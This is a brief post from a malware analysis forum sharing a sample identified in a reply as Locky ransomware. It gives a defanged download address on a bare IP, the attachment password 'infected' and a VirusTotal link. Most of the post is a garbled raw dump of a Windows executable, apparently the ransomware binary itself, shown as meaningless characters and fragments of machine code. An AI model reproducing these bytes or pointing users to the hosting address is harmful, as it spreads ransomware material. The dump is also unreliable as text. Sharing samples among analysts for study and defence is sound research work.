From hxxp://64.29.151.221/87yg5fd5
Attachments
password:infected
(280.89 KiB) Downloaded 76 times
(280.89 KiB) Downloaded 76 times
@xorsthingsv2
A forum for reverse engineering, OS internals and malware analysis
ikolor wrote:next ..it's Locky
https://www.virustotal.com/en/file/c22a ... 468350876/
몄ׯ꽪浽䝠䍻栕潎✢ᷢጜლ䓇ᅩ䛯⌄鎎ᾅ肫媮蛸醐鞏ꑨ畬䭜וֹ㆜夲⊭ŏ诺ꊘꖪ�⇅ᯘ㟖햦ꡙ绋䆸ᔳ�盡깴鴄龒ኸⴗ敔䓟䮌ʞ굲ꄄ핪䟁䊾鿸툲䅮︼熪鉸懪챜䣒⽖푔ᠪ㯠읇雸社ˮ群퇧쭗典쒬쟾쏕曯殺ꩱཀྵဂ風巩䥎8쨲䃳쨧᪭贒曂꺦ꇀ扞ӎں躭西֚뮶㑹㐒뇃䛦姮Ġ앎昴ⴶ☭陃黸楻窹脻뇢↹젪슞ᦺ䮴꒑翔ᘝ蘀絪⍎聦板䭦暈呺껩垣�㐐蔱ွ釅蜦턨㲻䤠粔
This program cannot be run in DOS mode.
$ }ŇŁ'9łÍt9łÍt9łÍt0Ë^t:łÍt9łĚtdłÍt0ËIt łÍt0ËXt(łÍt0ËNtwłÍt0ËGt:łÍt'áYt8łÍt9łZt8łÍt0Ë\t8łÍtRich9łÍt PE L ÇTW ŕ ~ (ď @ ° @ Tś ( € đ p P™ @ D .text ä˙ ŕ.rdata „“ ” @ @.data `Ę ° ľ @ Ŕ.rsrc đ € V @ @.reloc 6 \ @ B ‹˙U‹ěj j ˙učEÜ Ä]Ă‹˙VWľ°A V˙„A …ŔuVčŃi Y‹ř…˙„^ ‹5A hüA W˙ÖhđA WŁ mD ˙ÖhäA WŁ¤mD ˙ÖhÜA WŁ¨mD ˙Ö= mD ‹5¨A Ł¬mD t=¤mD t
=¨mD t…Ŕu$ˇ A Ł¤mD ˇ¬A Ç mD j@ ‰5¨mD Ł¬mD ˙¤A Ł°C ř˙„Ě ˙5¤mD P˙Ö…Ŕ„» č·Ş ˙5 mD čßŇ ˙5¤mD Ł mD čĎŇ ˙5¨mD Ł¤mD čżŇ ˙5¬mD Ł¨mD čŻŇ ÄŁ¬mD čO) …Ŕtehż@ ˙5 mD čîš Y˙ĐŁ°C ř˙tHh jč×U ‹đYY…öt4V˙5°C ˙5¨mD 軚 Y˙Đ…Ŕtj Vč™] YY˙€A N˙‰3Ŕ@ëč¦ 3Ŕ_^øN ‹°xD ˙Ň …ÉtQj ˙A P˙A Ăjhx›C č<ŕ Mŕ˙čB» ‹ř‰}Üč§
‹_h‹učĺ ‰E;C„W h čë, Y‹Ř…Ű„F ą ‹wh‹űóĄ# S˙učáĂ YY‰Eŕ…Ŕ…ü ‹uÜ˙vh˙´A …Ŕu‹Fh=Đ´C tPčş» Y‰^hS‹=°A ˙×öFp…ę ö»C …Ý j
č–> Yeü ‹CŁ”tD ‹CŁtD ‹CŁśtD 3Ŕ‰Eäř}f‹LCf‰EtD @ëč3Ŕ‰Eä= }